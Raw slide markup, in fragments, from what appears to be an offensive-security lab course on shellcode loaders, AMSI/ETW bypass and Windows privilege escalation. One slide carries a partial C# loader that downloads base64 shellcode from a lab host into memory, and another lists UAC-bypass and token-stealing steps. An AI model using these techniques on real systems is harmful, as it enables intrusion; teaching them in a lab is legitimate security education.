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64" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="256" r:id="rId12"/>
    <p:sldId id="260" r:id="rId13"/>
    <p:sldId id="258" r:id="rId14"/>
    <p:sldId id="270" r:id="rId1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82163"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="185" d="100"/>
          <a:sy n="185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C5A6-4F3C-D84D-9221-1C111BE58B0C}" type="datetimeFigureOut">
              <a:t>07/04/2025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C456-DB8C-ED4F-9E61-F11EE322FFA0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74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00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341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27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634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346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https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject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4884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96564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3566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EB0-FD68-C911-6FEE-A1126AA4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156B-E477-EBBF-DB58-6A9853FF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122-9B68-7115-8A56-B9FF9AE9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77B-F874-1CF4-CB8A-6434B90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A7-6573-D37F-44CA-A25C4C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10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C93-E28A-DCA1-86F1-5BDB9B93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ED448-95D6-A92E-4139-FCBC0B89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8612-A121-6041-16B9-770E99E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3068-A8A4-981A-DAE5-DBD1E4B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D831-8079-52F8-022A-24ED595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14192-E250-AC57-D5AB-75CD2F4D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0C84-EA5C-3F52-C6F2-7D98B1F8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3F53-3D9D-862F-F920-8245B40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FD39-FFB5-FD80-EB4D-EC718CD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41E-DF8B-B5F7-DE08-521EFFC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41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635-532B-BE07-9D06-0B7F69E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80EA-D6A9-11A6-2F82-7C019A4C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A67A-067F-90DE-F6D6-5789BD6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E636-152A-1ADD-1EDB-C1D51F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4B0-246C-B6EB-93DC-5C8DEA85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8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F93-BC45-491A-73C5-CE86ECD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6B78-F10C-10C4-446B-6A03731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A753-581A-5AB3-B58C-0DE00A1E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1742-CDC4-29FB-9AAF-B1BAC9B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548-AE7F-1166-82CD-E67B132E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67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1EB-963E-F2D0-8FEB-6B3CC3F8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4A5D-FCCD-83AC-4AE3-F3870123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7436-AA44-B818-61A6-FBFABC7F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98A7-ACFC-9116-5F4F-C583DB4B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DC3-1BC3-36CA-4A0F-ACC6DE76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BA0F-C8D7-7EA8-2161-5D89D6D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8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350-AFC9-D261-6879-FC5BEAB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5E34-D400-A8A8-9134-31DA786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CDA-E558-A8F5-1C78-3D52F08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BA5E-4313-8A6C-E1B7-D6DF7214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32DAE-7F1D-7DB3-9008-DD26A5E5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8AA8-3916-E53F-DF3D-9A6E9A4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6EBE-F62F-8259-4DA8-DD23AE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A00BE-A5A9-36FD-3989-7A3DE84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36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4AF-7B90-E28C-5223-8872946C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ADB1-FDE5-37CC-8322-CDC43DF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A106-C0EC-87EE-5D72-0AF6B0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D0D-2E15-8EA5-83C4-78F46CC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229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A0D21-02F2-49BA-1F9C-852AAF5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4BDAC-CD9C-78FD-5ED8-62C056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0010-EEF3-E26D-BBB4-2825BDD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71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182-9E23-CD8F-98BC-1382118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E6F3-C986-CEDB-815A-8DE2AFAF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8323-A4DE-0543-1D4E-B3791E3B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8683-FD80-4AD1-B765-6A4BB78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2971-6F0C-DF91-BF8B-D46A115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5D68-0017-409C-47FD-B5C6379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7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502-027C-967B-7E20-15E6CBE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BBE84-9563-8AF7-E58E-4699BA7D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D3BB-F398-0382-5478-B3F0D76E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F304-2B60-CDDF-CE3A-BB18ECD3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1DE3-1209-D980-D353-A1D5A0A6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12BB-0163-750C-254A-87FAD45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35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9946-229F-1042-4D9D-B75C50B6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AE09-E8D1-2EF6-E696-652C28CC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5301-2004-0FE3-F7C6-AF0C0DA1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B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
              <a:t>07/04/2025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58D-72D2-D51E-8AEF-65D32D6E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0E2A-65AC-0ACD-DC0B-D4AB6C99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3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189E8-FB4B-A77C-87C1-F46DA2D7096E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841157" y="976184"/>
            <a:ext cx="10234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AI, Shellcode, customize attack framework, bypass, AMSI, ETW, Syscalls, shellcode loader, unhooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/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313000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2E8-6AEC-5CC3-4D9D-7BACEA7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4076-69EF-069F-FEDE-E0BAF0C6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50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D8D0A-CCF7-963D-3C76-A1FA23D2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6" y="111211"/>
            <a:ext cx="12139472" cy="67467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BDC2B-6DF6-E6D6-502B-5BB962F613E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1828800" y="518984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0AEB1170-3BBB-E625-831B-7A79BFF6FFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588936" y="883404"/>
            <a:ext cx="1889088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52CD377-9B86-133F-3E92-8F6DE1647AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884256" y="1335543"/>
            <a:ext cx="94454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5297B0-00BD-7D72-BC40-4ECAAD8B5161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070352" y="3566056"/>
            <a:ext cx="134366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D0017-A38F-99BB-762D-A5F8C2EE8F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2478024" y="3661472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3D3334-6B6E-ED2C-BF71-A5A85BDD4D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601114" y="3522972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Entrypoint (method)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70F10-5485-D545-D676-D152016BE2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="380484"/>
            <a:ext cx="606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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>milar to libraries/header files -&gt; Compiler to use system namespace (dotnet framework)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C16E-3723-1C21-6AF6-7327AC2E3A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="1160364"/>
            <a:ext cx="390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Function declarations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P/Invoke to load unmanaged code (C# is managed code)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Windows API written in C and C++</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="12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1AD8-14A1-AF9D-5756-DA57F82B38ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3223381" y="1474042"/>
            <a:ext cx="728509" cy="454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5F815-A402-1012-F96A-64F01D430E0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02493" y="1483530"/>
            <a:ext cx="649397" cy="109587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EBF36-B57E-36CA-2B9B-A04B0231A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2887" y="1483530"/>
            <a:ext cx="349003" cy="16383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4D11D2-FF1C-27A6-049C-2BD6F5B82273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684238" y="906448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Unmanaged DLL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C28F0-5B53-8726-E04E-0CD5E1B49815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2384460" y="1234038"/>
            <a:ext cx="838921" cy="3670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24DFBF-E173-88A1-AC06-52F0D38ED746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753382" y="1839540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Return starting address of the memory code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will be injected into,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BAF3-5E0A-E793-86EF-7B5EC93C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47" y="3033185"/>
            <a:ext cx="4314832" cy="15464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650349-9EC3-E010-D6A9-A210E5CB93CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2607942" y="3644918"/>
            <a:ext cx="4817390" cy="120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B80DCA-8F22-064C-5755-6DB46D3D53DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428461" y="4515606"/>
            <a:ext cx="430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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc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465643-5CD2-7ECD-E088-03826B96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5" y="5033264"/>
            <a:ext cx="4215429" cy="15456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2583E-8AE1-31AD-38C2-5C79DD885334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3777388" y="4838194"/>
            <a:ext cx="3733148" cy="1457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1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5F3B-E7B5-8FE5-726B-1F26BC1A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4C6-9914-0C5E-9F3E-92A8E39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Remote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CC6-DE1A-7880-1678-F3D2445E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BE"/>
              <a:t>ownload shellcode remotely into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>getConsoleWindow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payloadUrl = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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"http://192.168.85.149:8000/payload.txt"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shellCode;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(WebClient client = </a:t>
            </a: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WebClient())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payloadBase64 = client.DownloadString(payloadUrl);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shellCode = Convert.FromBase64String(payloadBase64);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67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2324DE-41A3-CA8E-6D79-8D7DB26D4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91" y="617575"/>
            <a:ext cx="6502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4D718-6F4B-04AB-DFEB-B662D421C40C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5252484" y="1516912"/>
            <a:ext cx="3530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kernel32.dll</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernelbase.dll</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntdll.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yscall (transition user/kernel mode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2429861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86CF9-1E0F-CF73-12F9-21AF6EAE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Privilege escalation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71B45-721C-23E8-F31C-F5E99FE4DECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="1396203"/>
            <a:ext cx="3207616" cy="67710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Unprivileged user (student)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Limited Access Token</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE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30E41-D48E-8F78-2BD3-6D5E88336911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="1840382"/>
            <a:ext cx="1065387" cy="2154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800" b="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>edium integrity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871591-E1AA-800C-1ED6-287644F88677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="2444942"/>
            <a:ext cx="3207616" cy="73866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Admin user (student_adm)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE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7685F-CD44-B6BE-30B9-3E089F545636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="2889121"/>
            <a:ext cx="1065387" cy="2154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800" b="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>edium integrity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B513B-E457-25F8-79EE-235B40A86969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="3548744"/>
            <a:ext cx="3207616" cy="73866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Admin user (student_adm)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE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F8891E-990F-DFA0-6BB6-808691ED6C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="3992923"/>
            <a:ext cx="1065387" cy="2154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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity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F01DCF-3092-B135-2045-91FFF63943DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="4533041"/>
            <a:ext cx="3207616" cy="73866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System user (NT AUTHORITY)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE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729117-742F-AAB8-BDB8-466001D70932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="4977220"/>
            <a:ext cx="1065387" cy="21544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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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52B19FD-6161-D937-15D3-821098DD067C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7162208" y="2276673"/>
            <a:ext cx="614965" cy="460235"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19971"/>
              <a:gd name="adj2" fmla="val 1496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5894046-DBF0-5F26-F8F1-F0162FE909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62208" y="3316042"/>
            <a:ext cx="614965" cy="460235"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19971"/>
              <a:gd name="adj2" fmla="val 1496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DB2A78F-009F-0469-08BC-63FD41CF22AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995844" y="3413688"/>
            <a:ext cx="4095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UAC BYPASS (enable SeDebugPrivilege)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A504007-E6AF-F205-4823-2C2342A6E067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62207" y="4389733"/>
            <a:ext cx="614965" cy="460235"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19971"/>
              <a:gd name="adj2" fmla="val 1496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BECB30-0663-DF88-108D-DB1837805E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995844" y="2426737"/>
            <a:ext cx="38678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Misconfiguration/Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400"/>
              <a:t>eak permissions, dll sideloading/hijacking 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08F20F-97E4-EB09-7808-0D78C1F9D08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995844" y="4533041"/>
            <a:ext cx="3419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Abuse Privileges (i.e. steal token)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>- i.e. GetSystem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148782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8C098-234F-E862-0CBF-2DB0D188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4337737"/>
            <a:ext cx="1930149" cy="185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88065-A101-01D1-8165-1BFE8A4ED836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834736" y="4039286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Student machines (per student)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DBF50-9F54-052E-4AFA-9FAD408A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216" y="4337737"/>
            <a:ext cx="1950823" cy="188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8B0AB-8BEA-A426-FB2D-074272E9004D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7384912" y="408716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0F688-A41C-AACF-50A2-E3B821BC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423" y="4313023"/>
            <a:ext cx="1839944" cy="190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6DDB3-E73A-8421-1ACC-9DAEFE4CF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16" y="1329724"/>
            <a:ext cx="220980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D1C92-FB47-6E11-3E6B-F079F9621288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299866" y="114505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3794E-6A63-159C-99BC-12B9E87C9E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722075" y="1530344"/>
            <a:ext cx="397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Traefik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Guacamole (RDP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Portainer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Elastic + Kibana (Central data lake for all windows logs incl. DC)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9D59B-2669-EDF0-6C6B-D30CE57D177A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711514" y="339295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Winlogbeat (SYSMON)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763F-67C3-B010-A5FA-E0F05DF1A7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969495" y="6061161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Filebeat (ETW)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP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40E0DB-93B6-EB0B-8D1F-E9BCE0610FF3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2250239" y="1949560"/>
            <a:ext cx="1884063" cy="28922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21EF6D2-C3F1-CB41-4383-77A6E41429A5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5743316" y="3577625"/>
            <a:ext cx="1104900" cy="1701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8D6F2B-51C9-BB3C-1D49-48C5F3DD55E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213495" y="209040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ETW Logs</a:t>
            </a:r>
          </a:p>
          <a:p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7AB1B-6143-B9FB-73DC-5674900C0CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4587205" y="397944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Event Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-B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E3F7D-2AC4-B7AF-55AC-E41448ABDE28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4040659" y="2818714"/>
            <a:ext cx="1147559" cy="2099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C6D57-CDA8-75DA-2101-9D989C982CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2010730" y="2818713"/>
            <a:ext cx="3163171" cy="179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88AF05-A45B-F814-DF1E-B7B2E599CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188218" y="2844454"/>
            <a:ext cx="2015612" cy="163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487998-EEC3-B62E-E97F-5D2A5E4B5B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828515" y="3378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RDP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7EBF9-0DBE-24D6-6130-84EC157E2F30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692105" y="308919"/>
            <a:ext cx="9827" cy="8361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027286-7F16-507C-4586-B03DCF61BD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768080" y="332683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HTTP to Guacamole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CED628-5137-35B1-2F21-112A4FEBD438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="974521"/>
            <a:ext cx="10636594" cy="9299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9D060C-1319-3972-FF7D-05F1559CEE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10553304" y="12167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AZURE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934E5-02D5-6E6B-BE89-D0B1AEFF5D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10491520" y="2842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1B51EC-0B71-C72D-B9D8-24ADD54568CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991354" y="6061160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RDP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>DNS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F00B2-C954-D612-FE0D-2B15E139220B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606833" y="6054467"/>
            <a:ext cx="21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SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>HAVOC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>METASPLOIT</a:t>
            </a:r>
          </a:p>
